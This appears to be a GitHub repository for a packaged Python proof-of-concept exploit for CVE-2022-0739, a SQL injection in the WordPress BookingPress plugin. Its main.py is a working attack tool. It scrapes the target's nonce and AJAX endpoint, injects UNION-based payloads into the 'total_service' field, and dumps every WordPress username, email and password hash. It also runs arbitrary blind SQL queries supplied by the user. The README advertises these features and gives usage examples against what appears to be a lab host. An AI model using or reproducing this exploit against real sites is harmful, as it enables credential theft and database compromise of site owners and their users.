├── src └── cve_2022_0739 │ ├── __init__.py │ └── main.py ├── pyproject.toml ├── LICENSE ├── README.md └── .gitignore /src/cve_2022_0739/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | [build-system] 2 | requires = ["setuptools>=61.0"] 3 | build-backend = "setuptools.build_meta" 4 | 5 | [project] 6 | name = "cve-2022-0739" 7 | version = "1.0.0" 8 | authors = [ 9 | { name="Brandon Kreisel", email="BKreisel@users.noreply.github.com" }, 10 | ] 11 | description = "A POC for CVE-2022-0739" 12 | readme = "README.md" 13 | requires-python = ">=3.8" 14 | classifiers = [ 15 | "Programming Language :: Python :: 3", 16 | "License :: OSI Approved :: MIT License", 17 | "Operating System :: OS Independent", 18 | ] 19 | 20 | dependencies = [ 21 | "requests", 22 | "rich", 23 | ] 24 | 25 | [project.scripts] 26 | cve-2022-0739 = "cve_2022_0739.main:cli" 27 | 28 | [project.urls] 29 | "Homepage" = "https://github.com/BKreisel/CVE-2022-0739" 30 | "Bug Tracker" = "https://github.com/BKreisel/CVE-2022-0739/issues" -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Brandon Kreisel 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2022-0739 2 | Python PoC Exploit for [CVE-2022-0739](https://nvd.nist.gov/vuln/detail/CVE-2022-0739) 3 | 4 | ## Features 5 | * Database Metadata Lookup 6 | * Wordpress User Credential Dump 7 | * Arbitrary Blind Query Injection 💉 8 | 9 | ## Usage 10 | ```bash 11 | usage: cve-2022-0739 [-h] -u URL [-e EXEC] 12 | 13 | options: 14 | -h, --help show this help message and exit 15 | -u URL, --url URL URL of the page containing the BookingPress Widget 16 | -e EXEC, --exec EXEC Optional query for Blind SQL Injection 17 | ``` 18 | ### Information Leak 19 | ```bash 20 | cve-2022-0739 --url http://metapress.htb/event 21 | ``` 22 | 23 | ### Blind Injection 24 | ```bash 25 | cve-2022-0739 --url http://metapress.htb/event --exec "SELECT SLEEP(5)" 26 | ``` 27 | 28 | ## Installation 29 | 30 | ### PyPI 31 | ```bash 32 | python3 -m pip install cve-2022-0739 33 | ``` 34 | 35 | ### Manual 36 | ```bash 37 | python3 -m pip install cve_2022_0739-1.0.0-py3-none-any.whl 38 | ``` 39 | [Download Latest Release](https://github.com/BKreisel/CVE-2022-0739/releases/download/1.0.0/cve_2022_0739-1.0.0-py3-none-any.whl) 40 | 41 | ## Demo 42 | ### Information Leak 43 | [![demo](https://asciinema.org/a/544403.svg)](https://asciinema.org/a/544403?autoplay=1) 44 | 45 | ### Blind Injection 46 | [![demo-exec](https://asciinema.org/a/544404.svg)](https://asciinema.org/a/544404?autoplay=1) 47 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # VS Code 2 | .vscode/ 3 | 4 | # Byte-compiled / optimized / DLL files 5 | __pycache__/ 6 | *.py[cod] 7 | *$py.class 8 | 9 | # C extensions 10 | *.so 11 | 12 | # Distribution / packaging 13 | .Python 14 | build/ 15 | develop-eggs/ 16 | dist/ 17 | downloads/ 18 | eggs/ 19 | .eggs/ 20 | lib/ 21 | lib64/ 22 | parts/ 23 | sdist/ 24 | var/ 25 | wheels/ 26 | pip-wheel-metadata/ 27 | share/python-wheels/ 28 | *.egg-info/ 29 | .installed.cfg 30 | *.egg 31 | MANIFEST 32 | 33 | # PyInstaller 34 | # Usually these files are written by a python script from a template 35 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 36 | *.manifest 37 | *.spec 38 | 39 | # Installer logs 40 | pip-log.txt 41 | pip-delete-this-directory.txt 42 | 43 | # Unit test / coverage reports 44 | htmlcov/ 45 | .tox/ 46 | .nox/ 47 | .coverage 48 | .coverage.* 49 | .cache 50 | nosetests.xml 51 | coverage.xml 52 | *.cover 53 | *.py,cover 54 | .hypothesis/ 55 | .pytest_cache/ 56 | 57 | # Translations 58 | *.mo 59 | *.pot 60 | 61 | # Django stuff: 62 | *.log 63 | local_settings.py 64 | db.sqlite3 65 | db.sqlite3-journal 66 | 67 | # Flask stuff: 68 | instance/ 69 | .webassets-cache 70 | 71 | # Scrapy stuff: 72 | .scrapy 73 | 74 | # Sphinx documentation 75 | docs/_build/ 76 | 77 | # PyBuilder 78 | target/ 79 | 80 | # Jupyter Notebook 81 | .ipynb_checkpoints 82 | 83 | # IPython 84 | profile_default/ 85 | ipython_config.py 86 | 87 | # pyenv 88 | .python-version 89 | 90 | # pipenv 91 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 92 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 93 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 94 | # install all needed dependencies. 95 | #Pipfile.lock 96 | 97 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 98 | __pypackages__/ 99 | 100 | # Celery stuff 101 | celerybeat-schedule 102 | celerybeat.pid 103 | 104 | # SageMath parsed files 105 | *.sage.py 106 | 107 | # Environments 108 | .env 109 | .venv 110 | env/ 111 | venv/ 112 | ENV/ 113 | env.bak/ 114 | venv.bak/ 115 | 116 | # Spyder project settings 117 | .spyderproject 118 | .spyproject 119 | 120 | # Rope project settings 121 | .ropeproject 122 | 123 | # mkdocs documentation 124 | /site 125 | 126 | # mypy 127 | .mypy_cache/ 128 | .dmypy.json 129 | dmypy.json 130 | 131 | # Pyre type checker 132 | .pyre/ 133 | -------------------------------------------------------------------------------- /src/cve_2022_0739/main.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import re 3 | import requests 4 | import rich 5 | import rich.table 6 | import sys 7 | from dataclasses import dataclass 8 | from typing import Any, List, Tuple 9 | 10 | ASCII_ART = """ 11 | 12 | ░█████╗░██╗░░░██╗███████╗░░░░░░██████╗░░█████╗░██████╗░██████╗░░░░░░░░█████╗░███████╗██████╗░░█████╗░ 13 | ██╔══██╗██║░░░██║██╔════╝░░░░░░╚════██╗██╔══██╗╚════██╗╚════██╗░░░░░░██╔══██╗╚════██║╚════██╗██╔══██╗ 14 | ██║░░╚═╝╚██╗░██╔╝█████╗░░█████╗░░███╔═╝██║░░██║░░███╔═╝░░███╔═╝█████╗██║░░██║░░░░██╔╝░█████╔╝╚██████║ 15 | ██║░░██╗░╚████╔╝░██╔══╝░░╚════╝██╔══╝░░██║░░██║██╔══╝░░██╔══╝░░╚════╝██║░░██║░░░██╔╝░░╚═══██╗░╚═══██║ 16 | ╚█████╔╝░░╚██╔╝░░███████╗░░░░░░███████╗╚█████╔╝███████╗███████╗░░░░░░╚█████╔╝░░██╔╝░░██████╔╝░█████╔╝ 17 | ░╚════╝░░░░╚═╝░░░╚══════╝░░░░░░╚══════╝░╚════╝░╚══════╝╚══════╝░░░░░░░╚════╝░░░╚═╝░░░╚═════╝░░╚════╝░ 18 | PoC for [bold yellow]CVE-2022-0739[/bold yellow] - Wordpress BookingPresss Plugin Version < [bold yellow]1.0.11[/bold yellow] 19 | """ 20 | 21 | AJAX_RE = re.compile(r'"ajax_url":"([^"]*)"') 22 | NONCE_RE = re.compile(r"_wpnonce:'([^']+)'") 23 | TITLE_RE = re.compile(r"(.*)") 24 | VERSION_RE = re.compile(r"bookingpress_axios.*ver=([^']+)'") 25 | 26 | # --------------------------------------------------------------------------------------------------------------------- 27 | def error(txt: str): 28 | rich.print(f"[red][-] Error: [/red]{txt}") 29 | sys.exit(1) 30 | 31 | # --------------------------------------------------------------------------------------------------------------------- 32 | def status(txt: str, prefix=""): 33 | rich.print(prefix + f"[blue][*][/blue] {txt}") 34 | 35 | # --------------------------------------------------------------------------------------------------------------------- 36 | def success(txt: str, prefix=""): 37 | rich.print(prefix + f"[green][+][/green] {txt}") 38 | 39 | # --------------------------------------------------------------------------------------------------------------------- 40 | @dataclass 41 | class TargetParams: 42 | ajax_url: str 43 | nonce: str 44 | version: str 45 | 46 | # --------------------------------------------------------------------------------------------------------------------- 47 | def get_params(url: str) -> TargetParams: 48 | status(f"Requesting: {url}") 49 | try: 50 | resp = requests.get(url) 51 | except requests.exceptions.RequestException as err: 52 | error(str(err)) 53 | 54 | if not resp.ok: 55 | error(f"[blue]{resp.status_code}[/blue] {resp.reason}") 56 | 57 | if (match := TITLE_RE.search(resp.text)): 58 | title = match.groups(0)[0] 59 | else: 60 | title = "" 61 | 62 | status(f"Got Page. Title: '{title}'") 63 | 64 | if not (match := VERSION_RE.search(resp.text)): 65 | error("Unable to locate BookingPress plugin version") 66 | 67 | version = str(match.groups(0)[0]) 68 | 69 | try: 70 | (major, minor, revision) = tuple(int(x) for x in version.split(".")) 71 | if major > 1 or (major < 1 and minor > 0) or revision > 10: 72 | error(f"Version not vulnerable: [bold yellow]{version}[/bold yellow]") 73 | success(f"Vulnerable version detected: [bold green]{version}[/bold green]") 74 | except Exception: 75 | error(f"Failed to parse version: {version}") 76 | 77 | if not (match := NONCE_RE.search(resp.text)): 78 | error("Unable to locate Nonce") 79 | 80 | nonce = str(match.groups(0)[0]) 81 | success(f"Got Nonce: [bold green]{nonce}[/bold green]") 82 | 83 | if not (match := AJAX_RE.search(resp.text)): 84 | error("Unable to locate AJAX URL") 85 | 86 | ajax_url = str(match.groups(0)[0]).replace("\\","") 87 | success(f"Got AJAX URL: [bold green]{ajax_url}[/bold green]") 88 | 89 | return TargetParams(ajax_url, nonce, version) 90 | 91 | # --------------------------------------------------------------------------------------------------------------------- 92 | def data_query(params: TargetParams, query: str) -> Tuple[Any, Any, Any, Any, Any, Any, Any, Any, Any]: 93 | status(f"Running Data Query: [cyan]{query}[/cyan]", prefix="\t") 94 | post_data = { 95 | "action": "bookingpress_front_get_category_services", 96 | "_wpnonce": params.nonce, 97 | "category_id": 1, 98 | "total_service": f"-7502) UNION ALL ({query})-- -" 99 | 100 | } 101 | resp = requests.post(url=params.ajax_url, data=post_data) 102 | 103 | if not resp.ok: 104 | error(f"[blue]{resp.status_code}[/blue] {resp.reason}") 105 | 106 | try: 107 | json_data = resp.json()[0] 108 | except Exception: 109 | error("Data Query Failed. Probably Malformed.") 110 | 111 | return ( 112 | json_data["bookingpress_service_id"], 113 | json_data["bookingpress_category_id"], 114 | json_data["bookingpress_service_name"], 115 | json_data["service_price_without_currency"], 116 | json_data["bookingpress_service_duration_val"], 117 | json_data["bookingpress_service_duration_unit"], 118 | json_data["bookingpress_service_description"], 119 | json_data["bookingpress_service_position"], 120 | json_data["bookingpress_servicedate_created"] 121 | ) 122 | 123 | # --------------------------------------------------------------------------------------------------------------------- 124 | def version_info(params: TargetParams) -> Tuple[str, str, str, str ,str]: 125 | version_query = "SELECT VERSION(),@@version_comment,@@version_compile_os,0,USER(),DATABASE(),7,8,9" 126 | version, comment, os, _, user, db, *_ = data_query(params, version_query) 127 | return version, comment, os, user, db 128 | 129 | # --------------------------------------------------------------------------------------------------------------------- 130 | def blind_exec(params: TargetParams, query: str): 131 | status("Performing Blind SQL Injection...") 132 | status(f"Blind Query: [cyan]{query}[/cyan]", prefix="\t") 133 | post_data = { 134 | "action": "bookingpress_front_get_category_services", 135 | "_wpnonce": params.nonce, 136 | "category_id": 1, 137 | "total_service": f"1) AND ({query})-- -" 138 | 139 | } 140 | resp = requests.post(url=params.ajax_url, data=post_data) 141 | 142 | if not resp.ok: 143 | error(f"[blue]{resp.status_code}[/blue] {resp.reason}") 144 | 145 | success(f"Blind Inject finished in [bold green]{resp.elapsed.total_seconds()}[/bold green] seconds") 146 | 147 | # --------------------------------------------------------------------------------------------------------------------- 148 | def leak_creds(params: TargetParams) -> List[Tuple[str, str, str]]: 149 | user_count, *_ = data_query(params, "SELECT COUNT(*),2,3,4,5,6,7,8,9 FROM wp_users") 150 | success(f"User Count: {user_count}") 151 | 152 | creds = [] 153 | for idx in range(0, int(user_count)): 154 | query = f"SELECT user_login,user_email,user_pass,4,5,6,7,8,9 FROM wp_users LIMIT 1 OFFSET {idx}" 155 | username, email, password, *_ = data_query(params, query) 156 | creds.append((username, email, password)) 157 | return creds 158 | 159 | # --------------------------------------------------------------------------------------------------------------------- 160 | def cli(): 161 | parser = argparse.ArgumentParser() 162 | parser.add_argument('-u', "--url", required=True, help="URL of the page containing the BookingPress Widget") 163 | parser.add_argument('-e', "--exec", help="Optional query for Blind SQL Injection") 164 | args = parser.parse_args() 165 | rich.print(ASCII_ART) 166 | 167 | params: TargetParams = get_params(args.url) 168 | 169 | if args.exec: 170 | blind_exec(params, args.exec) 171 | return 172 | 173 | status("Fetching Target Info...") 174 | version, comment, os, db, user = version_info(params) 175 | success("Target Info:") 176 | success(f"Version : {version}", prefix="\t") 177 | success(f"Version Comment : {comment}", prefix="\t") 178 | success(f"Compile OS : {os}", prefix="\t") 179 | success(f"Database : {db}", prefix="\t") 180 | success(f"User : {user}", prefix="\t") 181 | 182 | 183 | status("Leaking Wordpress Credentials...") 184 | creds = leak_creds(params) 185 | 186 | table = rich.table.Table() 187 | table.add_column("Username") 188 | table.add_column("Email") 189 | table.add_column("Password Hash") 190 | 191 | for cred in creds: 192 | table.add_row(*cred) 193 | 194 | print("") 195 | rich.print(table) 196 | 197 | 198 | # --------------------------------------------------------------------------------------------------------------------- 199 | if __name__ == '__main__': 200 | cli() 201 | --------------------------------------------------------------------------------